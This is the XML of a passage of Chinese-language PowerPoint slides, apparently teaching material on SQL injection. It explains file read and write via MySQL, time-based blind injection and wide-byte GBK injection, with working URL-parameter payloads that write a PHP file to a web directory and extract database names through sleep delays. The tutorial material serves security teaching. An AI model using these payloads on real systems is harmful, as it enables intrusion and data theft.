          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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586246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注入漏洞分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13974416" y="7883053"/>
            <a:ext cx="8943975" cy="4038600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20C2FB87-5894-7470-27D5-85BDAE4F80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935" y="4164040"/>
            <a:ext cx="8336119" cy="769637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3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="15684500" y="3229610"/>
            <a:ext cx="6557645" cy="79406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2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7226555" y="5161267"/>
            <a:ext cx="9949222" cy="5113227"/>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p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用前提：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>需要当前用户具有相应文件权限。</a:t>
            </a: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p>
          <a:p>
            <a:pPr marL="514350" lvl="0" indent="-514350" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>需要后台数据库开启secure-file-priv参数的设置。</a:t>
            </a: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p>
          <a:p>
            <a:pPr marL="1428750" lvl="2" indent="-514350" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>secure_file_priv=''		不对mysqld 的导入或导出做限制</a:t>
            </a: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p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>读取文件，使用load_file()函数读取文件。</a:t>
            </a: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p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>写入文件，使用select……into_outfile'路径'导出数据到指定目录下。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入命令例如：?id=1 union select 1,'&lt;?php phpinfo();?&gt;',3 into_outfile 'C:\\phpStudy\\PHPTutorial\\WWW\\test.php'</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2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6024294" y="7664584"/>
            <a:ext cx="10057553" cy="53245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p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>...</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p>
          <a:p>
            <a:pPr defTabSz="825500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>...........</a:t>
            </a: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p>
          <a:p>
            <a:pPr defTabSz="825500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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p>
          <a:p>
            <a:pPr defTabSz="825500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.........</a:t>
            </a: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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E4E422C-3DCB-06B9-37B4-4409DBC5F7D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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5201424"/>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400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基于时间的盲注也叫延时注入，提交对执行时间铭感的函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句，通过执行时间的长短来判断是否执行成功，比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>正确的话会导致时间很长，错误的话会导致执行时间很短，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="24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en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>睡眠</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>暂停</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>时间为参数给定的秒数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="24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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//BENCHMARK()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数重复 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>次执行表达式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>expr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。它可以被用于计算 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MYSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>处理表达式的速度。结果值通常为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>if(expr1,expr2,expr3)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>条件语句，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>expr1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>的值为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>，则返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>expr2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>的值，如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>expr1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>的值为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>，则返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>expr3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>的值。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Shape 238">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5472F1D4-987E-F87B-91FC-176B9A753A0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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1009130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50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、判断是否存在延时注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="825500">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t> ?id=1' and sleep(10) --+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="825500">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>如图所示，观察请求的时间线，大概在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>秒以上，说明构造的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>sleep(10) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>语句起作用，可以把这个时间线作为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>注入的判断依据。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica Light"/>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endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="202124"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="825500">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、获取数据库名字：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> ?id=1' and if(ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(database(),1,1))= 115,sleep(5),0) --+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="825500">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、其他操作和布尔盲注同理</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55260AB2-A4C0-7B35-4B9F-B216EB18291B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D63812BA-CA07-2530-6516-1C338CCE9F55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4056889" y="4142909"/>
            <a:ext cx="15515999" cy="6038047"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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23329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400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>当某字符的大小为一个字节时，称其字符为窄字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>当某字符的大小为两个字节时，称其字符为宽字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>所有英文默认占一个字节，汉字占两个字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>常见的宽字节编码：GB2312,GBK,GB18030,BIG5,Shift_JIS等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>宽字节注入指的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> mysql 数据库在使用宽字节（GBK）编码时，会认为两个字符是一个汉字（前一个ascii码要大于128（比如%df），才到汉字的范围），而且当我们输入单引号时，mysql会调用转义函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（常见转义函数有addslashes、mysql_real_escape_string、mysql_escape_string）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
